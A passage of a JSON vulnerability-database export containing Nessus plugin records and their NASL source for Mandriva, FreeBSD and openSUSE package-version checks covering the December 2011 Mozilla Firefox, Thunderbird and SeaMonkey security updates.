yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-it-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ja-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ko-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-lightning-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-lt-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nb_NO-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nn_NO-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pt_BR-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pt_PT-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ru-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-si-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sq-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sv_SE-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-tr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-uk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-zh_TW-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"nsinstall-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:50:58", "description": "The Mozilla Project reports :\n\nMFSA 2011-53 Miscellaneous memory safety hazards (rv:9.0)\n\nMFSA 2011-54 Potentially exploitable crash in the YARR regular\nexpression library\n\nMFSA 2011-55 nsSVGValue out-of-bounds access\n\nMFSA 2011-56 Key detection without JavaScript via SVG animation\n\nMFSA 2011-58 Crash scaling video to extreme sizes", "edition": 26, "published": "2011-12-21T00:00:00", "title": "FreeBSD : mozilla -- multiple vulnerabilities (e3ff776b-2ba6-11e1-93c6-0011856a6e37)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2011-12-21T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-thunderbird", "p-cpe:/a:freebsd:freebsd:linux-firefox", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:seamonkey", "p-cpe:/a:freebsd:freebsd:linux-seamonkey", "p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:thunderbird"], "id": "FREEBSD_PKG_E3FF776B2BA611E193C60011856A6E37.NASL", "href": "https://www.tenable.com/plugins/nessus/57355", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57355);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n\n script_name(english:\"FreeBSD : mozilla -- multiple vulnerabilities (e3ff776b-2ba6-11e1-93c6-0011856a6e37)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mozilla Project reports :\n\nMFSA 2011-53 Miscellaneous memory safety hazards (rv:9.0)\n\nMFSA 2011-54 Potentially exploitable crash in the YARR regular\nexpression library\n\nMFSA 2011-55 nsSVGValue out-of-bounds access\n\nMFSA 2011-56 Key detection without JavaScript via SVG animation\n\nMFSA 2011-58 Crash scaling video to extreme sizes\"\n );\n # http://www.mozilla.org/security/announce/2011/mfsa2011-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-53/\"\n );\n # http://www.mozilla.org/security/announce/2011/mfsa2011-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-54/\"\n );\n # http://www.mozilla.org/security/announce/2011/mfsa2011-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-55/\"\n );\n # http://www.mozilla.org/security/announce/2011/mfsa2011-56.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-56/\"\n );\n # http://www.mozilla.org/security/announce/2011/mfsa2011-58.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-58/\"\n );\n # https://vuxml.freebsd.org/freebsd/e3ff776b-2ba6-11e1-93c6-0011856a6e37.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6355d6fe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox>4.0,1<9.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<9.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey<2.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-thunderbird<9.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey<2.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird>4.0<9.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:00:46", "description": "Mozilla Firefox and Thunderbird version 9 and seamonkey version 2.6\nupdates fix several security issues :\n\n - MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n\n - MFSA 2011-54/CVE-2011-3661: Potentially exploitable\n crash in the YARR regular expression library\n\n - MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n\n - MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n\n - MFSA 2011-58/CVE-2011-3665: Crash scaling video elements\n to extreme sizes", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : MozillaFirefox / MozillaThunderbird / seamonkey / etc (openSUSE-2011-101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3666", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-js", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other", "p-cpe:/a:novell:opensuse:seamonkey-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:xulrunner-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192", "p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:seamonkey-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel", "p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaThunderbird-devel", "p-cpe:/a:novell:opensuse:seamonkey-dom-inspector", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo-32bit", "p-cpe:/a:novell:opensuse:xulrunner-debuginfo", "p-cpe:/a:novell:opensuse:seamonkey-translations-other", "p-cpe:/a:novell:opensuse:mozilla-js-debuginfo-32bit", "p-cpe:/a:novell:opensuse:seamonkey-venkman", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:xulrunner-32bit", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols", "p-cpe:/a:novell:opensuse:chmsee-debugsource", "p-cpe:/a:novell:opensuse:mozilla-js192", "p-cpe:/a:novell:opensuse:xulrunner-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo-32bit", "p-cpe:/a:novell:opensuse:xulrunner-debugsource", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit", "p-cpe:/a:novell:opensuse:mozilla-js-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit", "p-cpe:/a:novell:opensuse:seamonkey-translations-common", "p-cpe:/a:novell:opensuse:mozilla-js-debuginfo", "p-cpe:/a:novell:opensuse:chmsee", "p-cpe:/a:novell:opensuse:xulrunner", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel-debuginfo", "p-cpe:/a:novell:opensuse:seamonkey-irc", "p-cpe:/a:novell:opensuse:enigmail", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo-32bit", "p-cpe:/a:novell:opensuse:xulrunner-devel-debuginfo", "p-cpe:/a:novell:opensuse:xulrunner-buildsymbols", "p-cpe:/a:novell:opensuse:seamonkey", "p-cpe:/a:novell:opensuse:mozilla-js192-32bit", "p-cpe:/a:novell:opensuse:chmsee-debuginfo", "p-cpe:/a:novell:opensuse:enigmail-debuginfo"], "id": "OPENSUSE-2011-101.NASL", "href": "https://www.tenable.com/plugins/nessus/74515", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2011-101.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74515);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\", \"CVE-2011-3666\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox / MozillaThunderbird / seamonkey / etc (openSUSE-2011-101)\");\n script_summary(english:\"Check for the openSUSE-2011-101 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox and Thunderbird version 9 and seamonkey version 2.6\nupdates fix several security issues :\n\n - MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n\n - MFSA 2011-54/CVE-2011-3661: Potentially exploitable\n crash in the YARR regular expression library\n\n - MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n\n - MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n\n - MFSA 2011-58/CVE-2011-3665: Crash scaling video elements\n to extreme sizes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=737533\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox / MozillaThunderbird / seamonkey / etc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chmsee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chmsee-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chmsee-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-irc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-venkman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xulrunner-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-branding-upstream-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-buildsymbols-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-debuginfo-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-debugsource-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-devel-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-translations-common-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaFirefox-translations-other-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-buildsymbols-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-debuginfo-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-debugsource-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-devel-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"MozillaThunderbird-translations-common-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 